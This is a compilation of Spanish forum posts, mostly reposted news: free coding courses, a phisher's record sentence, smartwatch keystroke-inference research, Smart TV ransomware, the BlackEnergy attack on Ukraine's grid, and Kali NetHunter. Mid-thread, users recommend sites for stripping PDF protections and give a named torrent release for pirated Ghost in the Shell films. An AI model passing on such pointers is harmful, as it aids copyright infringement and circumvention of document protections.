Gracias a los chicos de Tutellus podemos acceder a este curso gratuito en línea de programación para niños de 8 años en adelante.

Esta es una buena noticia que alegrará a muchos padres de familia. Gracias a la plataforma educativa Tutellus podemos acceder al minicurso gratuito de programación dirigido a niños. Se trata de una gran oportunidad para que los más pequeños de la casa potencien sus habilidades algorítmicas y desarrollen nociones básicas de programación.

Para ello vamos a recurrir a un software orientado a la creación de juegos: Scratch, un pseudo lenguaje de programación que es muy utilizado en las escuelas para estimular las habilidades mentales de niños sin la necesidad de dominar códigos complejos.

Entre sus principales ventajas, Scratch permite el desarrollo de procesos de pensamientos para introducirse en la programación sin mucho esfuerzo. Scratch se encuentra disponible para los sistemas Windows, Ubuntu, Mac y Sugar.

Pero eso no es todo, porque este curso también incluye un proyecto web que pondrá a prueba todos los conocimientos adquiridos por tus pequeños. En total estamos hablando de cuatro capítulos que se dividen en las siguientes temáticas: nociones preliminares, interfaz, movimiento, y coordenadas de pantalla.

¿A quién va dirigido el curso? Este curso de programación es recomendado para infantes de 8 años en adelante, siempre con la asesoría y el seguimiento de un adulto.


Como decíamos anteriormente, este curso se encuentra alojado en la base de datos de Tutellus, un sitio web dedicado a compartir cursos gratuitos en línea. Para confirmar tu inscripción al curso tienes que dirigirte al siguiente enlace: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Ahora podemos echar un vistazo general a todas las opciones que se muestran en el curso para despejar cualquier duda. En seguida debes hacer clic en el botón "Apúntate" para registrarte con una dirección de correo electrónico o usando tus cuentas sociales.

Después de llenar el formulario con tus datos personales ya puedes comenzar a explorar todo el contenido multimedia que se incluye en el curso gratuito. Al finalizar el programa puedes solicitar un certificado digital que acredite el tiempo invertido (no es gratis).

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

En varias ocasiones hemos hablado de determinadas campañas de phising con las que piratas informáticos tratan de engañarnos para conseguir determinada información importante o confidencial de nuestros equipos infectados y con la que posteriormente tratan de sacar su propio beneficio. Una de las tareas que más se repiten cada día y que a su vez está cada vez más perseguida por las autoridades en todo el mundo.

Una de las campañas de phising más famosas fue la que hace algo más de dos años un joven de 26 años, consiguió engañar a un gran número de personas para conseguir  sus datos bancarios. Toda la trama era parte de un esquema de fraude de tarjetas de crédito a partir del cual Onur Kopçat, utilizaba los datos bancarios obtenidos de las víctimas para llevar a cabo operaciones fraudulentas.


Pues bien, ayer mismo, el joven ciberdelincuente, ha recibido una condena récord por todos sus actos que alcanza los 334 años de cárcel. Hay que decir, que Kopçak había sido condenado por un lado a 199 años de prisión, pero ayer mismo se le sumaban otros 135 años más, por lo que acumula una sentencia final de 334 años gracias a la campaña de phising con la que logró estafar a muchas personas.

Según informa unos de los diarios turcos, el joven hacker es acusado de varios delitos comofraude de identidad, falsificación de sitios web o fraude electrónico entre otros. Y es que durante este mismo año, muchos clientes de diferentes bancos fueron alertando de dichas maniobras por las que fue perseguido hasta su localización y por lo que inicialmente se le condenó con 199 años, 7 meses y 10 días de cárcel.

Pero la investigación ha continuado, ya que las quejas de clientes se seguían produciendo, llegando a realizarse un nuevo juicio que finalizó ayer mismo y por el que se le han añadido otros 135 años más de cárcel a su sentencia inicial. Por lo tanto, cuenta con una pena total de 334 años de cárcel, sin duda la pena más grande que un hacker ha recibido por este tipo de delitos cibernéticos, ya que hasta el momento hemos visto como las sentencias más duras por estos hechos, no solían sobrepasar los 20 años de cárcel.

Parece que los delitos a través de la red se podrían empezar a endurecer seriamente, puesto que es algo a lo que casi a diario estamos expuestos y donde pueden ser muchas las víctimas de este tipo de estafas en muy poco tiempo.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Al igual que Santa Claus, los sensores de movimiento ingenioso en su SmartWatch saben cuando estás durmiendo, saber cuando estás despierto, y probablemente saben si ha sido bueno o malo, también. Pero, con un poco de ayuda de redes neuronales avanzadas, podrían ayudar a un criminal cibernético robar su ATM acceso?

Ellos tal vez sí.

Así lo afirma la Universidad IT de Copenhague estudiante de Tony Beltramelli, en su trabajo de investigación reciente. Si tiene razón, smartwatches y otros wearables podría representar a la "superficie de ataque generalizado" por excelencia: usted podría ser vulnerable cada vez que usted está usando una.

En primer lugar, os hablamos de este riesgo en septiembre, cubriendo trabajos anteriores de sus estudiantes de Ingeniería Eléctrica y Computación Profesor Romit Roy Choudhury y en la Universidad de Illinois.

Al escribir – ya sea en una tableta o smartphone teclado, caja fuerte sistema de entrada del hotel, la construcción, o ATM – obviamente estás en movimiento. Sus patrones de movimiento pueden ser traducidos de nuevo en lo que tus dedos acaba de escribir.

Pero inferir las pulsaciones del teclado es difícil de hacer. Esos datos con sensor de movimiento prima es muy ruidoso. Algunas personas se mueven mucho cuando están escribiendo, otros no tanto. Algunos se acercan al teclado de diferentes alturas o ángulos; algunos son más rápido o más lento.

Ritmos de pulsaciones son lo suficientemente único que han sido utilizados junto con las contraseñas de autenticación de múltiples factores. Los diferentes tamaños de los dispositivos, las orientaciones de pantalla y chips sensores pueden afectar a la precisión, también.

Para superar estos problemas, los investigadores vinculan los datos del sensor de movimiento con las redes neuronales y sistemas de aprendizaje automático. Pero sigue siendo difícil. Nuevo trabajo cortocircuitos de BELTRAMELLI gran parte de la complejidad, lo que podría hacer la inferencia de teclas mucho más realista.

Su ingrediente secreto: algoritmos de aprendizaje profundas avanzados (en concreto, 'RNN-LSTM' si tienes curiosidad). Estos algoritmos han estado yendo gangbusters en visión por computador y procesamiento del lenguaje, pero no con los datos del sensor de movimiento – hasta ahora.

Beltramelli afirma que su sistema de aprendizaje profundo puede alcanzar hasta un 73% de precisión en touchlogging y 59% en keylogging, incluso con los datos crudos, sin procesar. (Vea un ejemplo para usted mismo, a continuación.)

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Eso es, obviamente, lejos de ser perfecto. Pero es lo suficientemente impresionante que un cracker puede ser capaz de obtener el resto del camino utilizando otros medios.

Es más, las redes neuronales y la tecnología SmartWatch están mejorando rápidamente, lo que permite una mayor precisión. (Tenga en cuenta, por ejemplo, el potencial de integrar el movimiento con otros sensores, como la respuesta galvánica de la piel.)

Y, como Beltramelli señala, los algoritmos que está utilizando están ampliamente disponibles en proyectos de código abierto. Así que cualquiera puede moverse adelante este trabajo – y probablemente lo hará.

Para que un ataque como el que esto funcione, los malos tienen que capturar los datos del sensor, a través de una aplicación maliciosa en el portátil, aunque no hay evidencia de que esto ha sucedido todavía.

Entonces que puedes hacer? Enterrado en la página 73 del documento del Beltramelli es una poderosa medida de precaución que usted puede tomar ahora.

Si usted no está haciendo ya, use el dispositivo en la mano que no utiliza para entrar en los inicios de sesión del teclado.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Los creadores de virus se adaptan a los nuevos tiempos, y tras dejar millones de infectados en ordenadores y móviles de todo el mundo, ahora comienzan a infectar las Smart TVde nuestro hogar. Un caso acaba de suceder, y podría ser el principio de una gran infección.

Kaspersky Labs se encuentra investigando un nuevo tipo de malware que acaba de llegar a las Smart TV, aquellas televisiones inteligentes que nos permiten no sólo conectarnos a Internet, sino también ofrecer elementos de valor añadido a la experiencia de usuario con los canales de televisión favoritos.

Un usuario en Reddit ha informado que en su navegador del Smart TV sale una ventana emergente que le impide usar dicho navegador incitándole a que llame a un número de teléfono para, supuestamente, resolver este problema. Se trata de un malware amparado enJavaScript que aúna en un sólo malware el tipo ransonware (bloqueo de sistema) y unscareware (servicios técnicos falsos).

Si bien, en general, no es muy común que se vean virus en una Smart TV, está claro que los códigos maliciosos se están adaptando a los nuevos tiempos. La mayoría de las Smart TV vienen con Android OS instalado, y esta norma hace que se haya seguido muy de cerca la evolución de este malware para saber su comportamiento, y así evitar que haya más casos.


Según el código fuente de este malware, parece dirigir a una serie de dominios que anteriormente se han utilizado como vehículo de otros malware, lo que deja claro que se trata de una infección que ha sido creada por profesionales con amplia experiencia en soluciones malignas de malware.

Los investigadores de Kaspersky Labs han conseguido autoinfectarse con este virus en un sistema con Windows XP. Han comprobado que la ventana emergente que se lanza en la infección sólo provee un número de teléfono que va cambiando según la localización del ordenador o sistema infectado. Según estiman, este malware aún se encuentra incompleto en la Smart TV, lo que hace ver que se trata de un primer prototipo que podría ir mejorando con el tiempo.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Hay una pagina web que ignora todas las protecciones de los PDF incluso los convierte a word, ahora mismo no la recuerdo para ya me comunique con otra persona que puede tener aun la url de ese servicio.

Por el momento podrías probar con alguna de estas:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Si mi memoria no me falla, fue con esta que se ignoran las protecciones del archivo:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Me comentas cualquier cosa.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Oye excelente! gracias por el enlace! soy súper fanático de la serie!.
H.H!

Verdad que es una excelente serie a que siiiii muajajajjajajaja, acabo de actualizar el post con las versiones descargables de todas las series anime y peliculas antes de esta del 2015, si alguien conoce una colección con mejor calidad por favor comparta el enlace XD

CitarVersión descargable de todos los animes y películas anteriores a la 2015 en HD:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Bueno para quienes no saben que es Ghost in the Shell es un anime de hackers que data de por allá de 2002 muy recomendada.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
PD: Me faltaba GIS Arise que esta aca: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Primer versión del Anime:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Versión descargable de todos los animes y películas anteriores a la 2015 en HD:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Mas información sobre la serie:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Película nueva lanzada en el 2015:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Yo recomiendo bajarla desde donde dice abajo abajo:
Download Ghost in the Shell: The New Movie (2015) 1080p On Internet
extratorrent.cc Ghost in the Shell The New Movie 2015 JAP 1080p BluRay x264 AC3 JYK Torrent

Los subtítulos en español:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Son los que dicen: Versión 1080p.BluRay.x264.AC3-JYK

---

Un complemento a la serie: !Advertencia de Spoiler, no leer esto si no vas ya mas allá del episodio 11 de la versión Ghost In The Shell Stand Alone Complex(2003).
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Hola @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login tú ya te inscribiste en alguno? 
Solo curiosidad 

El que mas me llama la atención es el de: #08. Seguridad para PyMEs , va ser el primero que tomare.

El pasado 23 de diciembre más de medio millón de ucranianos sufrieron un apagón de energía eléctrica que duró unas horas. Ahora conocemos la relación entre esta incidencia y un malware que afectó a varias centrales eléctricas del país.

El corte de luz afectó a la mitad de los habitantes de la región ucraniana de Ivano-Frankivsk, con una población de 1,4 millones de habitantes. ESET ha realizado una investigación del ataque y ha publicado unos interesantes resultados. Según la firma el culpable es el malware conocido como BlackEnergy, que se encargó de instalar el troyano KillDisk que impide el arranque de los sistemas.

El propio CERT ucraniano (You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login) reconoció el pasado noviembre la relación entre ambas muestras de malware en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login ucranianos durante las elecciones locales del país en 2015. Los delincuentes consiguieron destruir múltiples documentos y vídeos.

ESET confirma la infección por BlackEnergy y KillDisk en varias empresas de distribución de electricidad en Ucrania. Según la firma antivirus en esta ocasión la infección se realizó a través de archivos de Microsoft Office con macros maliciosas, enviados a través de correos electrónicos dirigidos. Una técnica habitual empleada por múltiples grupos de delincuentes para llevar a cabo este tipo de ataques.


El documento que se ha mostrado como muestra del ataque trababa de convencer al usuario para que ejecutara la macro maliciosa. En este caso no se empleaba ninguna vulnerabilidad para tratar de infectar el sistema, sino que trataba de engañar al usuario para que ejecutara la macro maliciosa.

En la incidencia de Ucrania se ha podido comprobar que BlackEnergy se encargó de instalar el malware KillDisk. Este troyano borra archivos importantes del sistema para impedir su arranque. Además confirman que la variante de KillDisk detectada también contenía funciones específicas para el ataque a sistemas industriales.

Este caso muestra la importancia de proteger este tipo de infraestructuras críticas y la protección especial que deben tener los sistemas SCADA (Supervisory Control And Data Acquisition). Un tipo de ataques e incidencias que sin duda crecerán cada vez más, aunque esperemos que las protecciones sean adecuadas y los usuarios finales no nos veamos afectados.

Más información:

El troyano BlackEnergy ataca a una planta de energía eléctrica en Ucrania
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Potential Sample of Malware from the Ukrainian Cyber Attack Uncovered
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login#

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

La Academia ESET nos sorprende gratamente con un puñado de cursos 100% gratuitos que son ofrecidos para el público en general. Si te apasiona la tecnología y quieres aprender algo nuevo, entonces esta es tu gran oportunidad para capacitarte con la asistencia personalizada de un equipo de profesionales y expertos en seguridad informática.

La Academia ESET cuenta con una serie de programas educativos gratuitos y de pago orientados a la formación técnica y prevención de infecciones. También puedes aprender algo de programación, conectividad y telefonía móvil.

Esta no es la primera vez que una firma reconocida brinda una lista actualizada de cursos en línea. Anteriormente hemos visto un grupo de cursos gratuitos certificados por Microsoft, así como 8 diplomados en línea dictados por Google.

Cómo registrarse en los cursos gratis de ESET

Todos los cursos que veremos a continuación están disponibles gratuitamente de principio a fin, sin embargo, también hay otras propuestas muy interesantes que tienen una cuota atractiva e incluyen otros privilegios exclusivos para estudiantes.

El proceso de registro de los cursos online de ESET es muy sencillo. En primer lugar tienes que dirigirte a los enlaces que hemos incluido después de cada descripción. En seguida podemos acceder a los detalles e información oficial del curso.

Para inscribirte hay que hacer clic en el botón "Inscribirme" y colocar algunos datos personales como: nombres, correo electrónico y contraseña de acceso. Por último, confirma tu participación al curso y explora las diferentes unidades de aprendizaje que se incluyen en el programa.

Al finalizar el curso tienes que realizar una evaluación final para acreditar todos los conocimientos adquiridos a lo largo del curso. Sin más preámbulos, veamos cuáles son las posibilidades educativas que nos regalan los chicos de la Academia ESET.

12 cursos online gratis dictados por ESET

#01. Análisis de Malware
Dictado por: Academia ESET
Contenido: conoce cuáles son los los aspectos básicos para la detección e interpretación del análisis de Malware (este curso es una versión de prueba).
Enlace: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#02. Curso de Seguridad para Padres
Dictado por: Academia ESET
Contenido: un excelente curso gratuito dirigido a padres que desean conocer las herramientas adecuadas para la protección parental.
Enlace: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#03. Uso seguro de medios informáticos
Dictado por: Academia ESET
Contenido: aprende a identificar las principales amenazas y medios de prevención ante la amenaza de códigos maliciosos, malware y otras infecciones.
Enlace: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#04. Cómo armar una red hogareña segura
Dictado por: Academia ESET
Contenido: un buen curso para aprender a crear una red de computadoras que sea segura y garantice la comodidad de todos los miembros de la familia.
Enlace: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#05. Seguridad en las transacciones comerciales en línea
Dictado por: Academia ESET
Contenido: la finalidad de este curso gratuito es dar a conocer cómo funciona el comercio electrónico y las medidas de prevención para hacer una compra segura.
Enlace: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#06. Gestión y respuesta de incidentes
Dictado por: Academia ESET
Contenido: curso dirigido a las pequeñas y medianas empresas para aprender a organizar proyectos de recuperación para responder eficientemente ante incidentes.
Enlace: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#07. Curso de Backup
Dictado por: Academia ESET
Contenido: un curso muy interesante sobre la importancia de gestionar copias de seguridad con toda la información relevante de tus equipos.
Enlace: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#08. Seguridad para PyMEs
Dictado por: Academia ESET
Contenido: ninguna empresa se puede perder este curso gratuito que aborda temas de seguridad, soporte técnico y protección informática.
Enlace: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#09. Navegación segura
Dictado por: Academia ESET
Contenido: un curso necesario para navegar en la red tomando algunas medidas de seguridad, detectando posibles amenazas en Internet y evitando riesgos de infección.
Enlace: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#10. Seguridad en dispositivos móviles
Dictado por: Academia ESET
Contenido: un curso ideal para usuarios móviles. Aprende a proteger la información personal que administras desde un teléfono inteligente.
Enlace: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#11. ESET Mobile Security para Android
Dictado por: Academia ESET
Contenido: si tienes un dispositivo Android, no te pierdas este curso gratuito para hacer un uso productivo de la interfaz móvil de ESET.
Enlace: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#12. Introducción a Python
Dictado por: Academia ESET
Contenido: en este curso gratuito aprenderás las nociones básicas para introducirte en uno de los lenguajes de programación más utilizados en el mundo.
Enlace: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Descripción:
¿Eres un emprendedor y sufres de alguno de los siguientes síntomas?
Gastas demasiado en desarrollo y ni siquiera entiendes lo que el desarrollador dice. Cada vez que quieres arreglar algo sencillo en tu sitio web (como cambiar un enlace o una imagen) debes pagar de más y esperar semanas a que se concrete. No puedes avanzar con tu idea de negocio porque no sabes programar ni siquiera un prototipo. Si es así déjame decirte que no estás sólo. Trabajo con muchos emprendedores y los problemas mencionados los escucho cada semana. Las razones son las siguientes:
Todas las PYMES y emprendedores necesitan desarrollo en algún grado. Esto puede ir desde una simple página web con una descripción de la empresa, hasta cosas más avanzadas aplicaciones móviles y sistemas informáticos.
Los desarrolladores son caros y escasos, y por ende representan un alto costo para el emprendedor.
Dice el dicho "Programming is the new Math", la programación es clave en el mundo actual y lamentablemente no te lo enseñaron en el colegio.
Para hacernos cargo de este problema en ZENVA hemos creado los cursos de la serie Cómo Programar para Emprendedores, donde queremos dotar a emprendedores como nosotros los conocimientos y herramientas básicas de desarrollo web para que puedan tener mayores probabilidades de éxito con sus proyectos.
En Cómo Programar para Emprendedores – javascript veremos desde cero cómo programar en este lenguaje, el cual es utilizado ampliamente hoy en día para crear, entre otras cosas:
Sitios web interactivos.
APP móviles y para TV.
Videojuegos.
Aplicaciones web en el servidor.
Como es de costumbre en los cursos de ZENVA, una vez cubiertos los conceptos básicos desarrollaremos un mini-projecto, el cual será un prototipo interactivo de una aplicación móvil de buscar pareja.
Contenido:
1. Introducción
2. Incluyendo el JS
3. Consola
4. Variables
5. Operaciones Artiméticas
6. Strings
7. Funciones
8. Funciones anidadas
9. Condición IF
10. Operaciones Booleanas
11. Negación
12. Condición Else
13. Condición Switch
14. Funciones con condiciones
15. Iteración While
16. Break
17. Continue
18. Iteración For
19. Arreglos
20. Arreglos push() y pop()
21. splice()
22. Iteraciones en arreglos
23. Arreglos Multidimensionales
24. Objetos
25. JSON
26. Undefined
27. Plantilla HTML
28. Estilo del Proyecto
29. Eventos en JS
30. Selecciones y Evento click
31. Modificando el HTML con JS
32. Accediendo al Input del Usuario
33. Representando Datos con JSON
34. HTML por Usuario
35. Filtrado
36. Resumen

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

¿Quieres formarte como desarrollador PHP? Tanto si partes desde 0 como si ya has tenido una toma de contacto con el lenguaje, el Master PHP te ofrece una formación estructurada y práctica con ejemplos reales mediante los cuales aprenderás a trabjar con PHP.

Paso a paso, te enseñaré a implementar contenidos de forma dinámica en páginas html, desarrollar scripts propios para carritos de la compra, pasando por la programación orientada a objetos en PHP y técnicas para el debug.

A lo largo del curso, te mostraré en video de forma didáctica como debes trabajar e implementar esta tecnología. Para que no te pierdas, hemos diseñado un curso que aumenta su nivel de forma progresiva:

• Fundamentos de PHP
• Implementación del lenguaje
• Solución de errores (SEO, integración con HTML, CSS, MySQL...)
• Creación de scripts (carrito de la compra)
• P.O.O.
• Debugging

Mi nombre es David Piqué y llevo más de 10 años desarrollando proyectos de forma profesional así como impartiendo cursos. PHP es un lenguaje muy potente y gratuito que puede llevar tus proyectos en la web al siguiente nivel, si est´s determinado a aprender de una vez por todas PHP, te invito a formar parte de este curso, en el que yo mismo te ayudaré a superar cualquiera de los capítulos.

¿Cuáles son los requisitos?

• Si bien este curso no requiere de conocimientos previos, usarios con alguna base en lenguajes tipo HTML o CSS, podrán sacarle un mayor partido
• Este curso se puede seguir con Winodws, Mac y Linux.

¿Qué voy a aprender en este curso?

• ¡Más de 108 clases y 8.5 horas de contenido!
• Desarrollar webs dinámicas, así como aplicaciones con PHP
• Desarrollar scripts a medida
• Aprender los fundamentos de la programación orientada a objetos de una forma práctica
• Implementar técnicas para el debbuging en páginas y aplicaciones realizadas con PHP

¿A quién está dirigido?

• Toda persona que tenga el interés en aprender a desarrollar proyectos con PHP
  
• Aquellos diseñadores web que usan HTML y CSS y deseen añadir dinamismo a sus páginas
  
• Gente que ha tenido una toma de contacto con el lenguaje y quiere aprender estándares y buenas prácticas para un correcto desarrollo

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Fuente con todos los videos en youtube: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
link caido

Ya lo subi de nuevo compañero, gracias por informar.

Hace tiempo que hablamos de los desarrollos de Jide, una empresa que primero quiso proponernos un tablet convertible, luego un mini PC de 30 dólares basado en Android. En esas propuestas lo más interesante no era el hardware, sino el software.

Los responsables de Jide han creado una versión de Android que está orientada a entornos de escritorio y en este último CES han anunciado algo especialmente interesante: el lanzamiento inminente de Remix OS, un sistema operativo que se podrá descargar gratuitamente y que parece demostrar que Android sí puede tener sentido en el escritorio de un PC o un portátil x86.

Android quiere conquistar el escritorio

El próximo 12 de enero será posible You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, ese sistema operativo que es básicamente una versión modificada del proyecto You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login que desde hace tiempo permite ejecutar Android en arquitecturas x86 y por ejemplo instalarlo en PCs y portátiles.


Las limitaciones para el uso de este proyecto eran notables sobre todo por el hecho de que nos encontrábamos con un sistema que se adaptaba de forma pobre a entornos en los que los recursos invitan a tener varias aplicaciones en el escritorio y a disponer de un entorno de ventanas con una multitarea más eficiente.

La ejecución de aplicaciones Android en un escritorio tradicional existen desde hace algún tiempo. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login es probablemente una de las más conocidas a la hora de hacer funcionar estas herramientas sobre Windows a través de la virtualización de las aplicaciones Android, pero muchos fabricantes habían tratado de ofrecer Android como opción en equipos Todo-en-Uno y en portátiles y tablets convertibles que tenían ese arranque dual con Android y Windows. La propuesta de Jide es distinta.

Así es Remix OS

Con Remix OS llega una propuesta que trata de demostrar que esa dualidad no es necesaria y que este fork de Android puede convertirse en una opción válida para los usuarios. En este SO nos encontramos con diversas opciones que transforman la experiencia móvil en una experiencia de escritorio, a saber:

Multitarea: en Remix OS se ofrece soporte multi-ventana para poder mostrar varias ventanas de aplicación con en sistemas operativos tradicionales de escritorio como Windows, Linux o OS X. Esas ventanas son además redimensionables y en ellas encontramos también los botones de maximizar y minimizar ventana.

Menú de inicio: otro de los elementos clásicos de los sistemas operativos de escritorio es el menú de inicio que también está presente en este sistema operativo y que es además parte de la barra de tareas y la bandeja del sistema. El aspecto visual es muy similar al que de nuevo ofrecen sistemas operativos de escritorio.

Sin renunciar a las notificaciones: en Remix OS encontramos un sistema de notificaciones que se despliega en la parte derecha y que aun ofreciendo ese acercamiento a entornos móviles también demuestra que este concepto es válido para el escritorio.

Atajos de teclado y ratón: seguiremos teniendo acceso a diversos atajos de teclado ya tradicionales como los que nos permiten crear nuevos documentos o salvaguardarlos, además del eterno Ctrl+C y Ctrl+V para copiar y pegar elementos y ficheros. No solo eso: también tendremos acceso al botón derecho del ratón, que mostrará opciones extendidas sobre aplicaciones y elementos de la interfaz.

Explorador de archivos: aunque en Android existen desde hace tiempo diversas alternativas para navegar por nuestro sistema de archivos, en Remix OS nos proponen de nuevo un explorador de archivos más cercano a la experiencia de escritorio y en el que tendremos soporte de funciones como arrastrar y soltar archivos y directorios y en el que también existe acceso a medios de almacenamiento externo. No queda claro si será posible acceder a carpetas de red.

En toda esa oferta queda patente que entre las ventajas de esta propuesta está el hecho de que podremos acceder a todo el inmenso catálogo de Google Play -incluidas herramientas ofimáticas como la suite Office para Android- y que las actualizaciones del sistema se realizarán de forma muy sencilla gracias a todo lo heredado en Android.

Google, toma nota

A falta de evaluar el sistema y de comprobar si ofrece una experiencia realmente completa, lo cierto es que la propuesta de Remix OS es una de las más interesantes de los últimos tiempos en el ámbito de los sistemas operativos.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


De hecho Google debería tomar buena nota de lo logrado en este proyecto que logra adaptar Android al escritorio en plataformas x86, y es probable que trasladar este mismo concepto a arquitecturas ARM no sea nada complicado.

Hace unas semanas supimos que Google plantea cierto You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login Aunque la empresa no ha confirmado dichos rumores parece evidente que esa plataforma híbrida podría representar una forma muy interesante de conquistar a los usuarios de PC y portátil. Con plataformas tan ambiciosas como Windows 10 en las que el móvil y el escritorio se unen al fin parece que esta propuesta de Jide podría servir a Google como inspiración.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

---

Esto salió a la venta en formato Mini PC en Kickstarter y lo podéis pedir a China You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login En You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login lo revisaron el mes pasado y tiene que pulirse y va algo justo con el hardware ARM que ellos venden You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Desarrolladores de Kali Linux liberan el Kali Linux NetHunter 3.0 Android Mobile Penetración Plataforma de Pruebas
Los investigadores de seguridad, los hackers éticos y pentesters ahora pueden alegrarse. La última herramienta de pentesting para teléfonos inteligentes y tabletas Android, Kali Linux NetHunter 3.0 aplicación para Android ha sido puesto en libertad por Offensive Security, la compañía detrás de Kali Linux. La aplicación que estaba en desarrollo durante más de un año se dio a conocer hoy por Offensive Security.
Kali NetHunter 3.0 se jacta de una interfaz de usuario completamente rediseñada que ha estado centrada en la aplicación. Offensive Security dijo que la nueva aplicación apoyará para los ataques nuevos y complejos, mientras que el apoyo a la gestión de su chroot Kali independiente, incluyendo la capacidad de eliminar y reconstruir  chroot, junto con el apoyo para la selección de metapackages individuales en el respectivo chroot.
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login sobre la liberación dice:

"NetHunter se ha desarrollado activamente por más de un año, y ha sufrido nada menos que una transformación completa desde su último lanzamiento. Hemos tomado nuestro tiempo con la versión 3.0, y los resultados son una revisión completa de la aplicación NetHunter Android, con una interfaz más pulida y un conjunto de características que funcione plenamente. "
Kali NetHunter 3.0 también apoyará el último sistema operativo de Google Android 6.0 Marshmallow móvil, junto con el soporte para la serie Android 5.0 Lollipop. También apoyará las OnePlus en teléfono. Además, la aplicación cuenta con nuevos scripts de construcción basado en el lenguaje de programación dinámico Python, y que puede ser fácilmente portado a nuevos dispositivos.
Usted puede leer toda la documentación NetHunter oficial que incluye nuevos temas como la descarga, la construcción y la instalación de NetHunter, junto con una visión general de las características de la aplicación y los ataques disponibles.

Por último, pero no menos importante, ahora hay un instalador NetHunter que se ejecuta correctamente en los sistemas operativos, el apoyo a Nexus y OnePlus con un dispositivos GNU/Linux y Mac OS X.

Puede descargar el Kali NetHunter 3.0 desde el You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login. También puede acceder a toda la documentación y tutoriales relevante en el sitio web.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

14

Cl0udswX Tu publicación del manifiesto hacker fue tu mensaje numero 666 en el foro muajajjajajajajajjajajajjajajjaa, eres illuminati XD

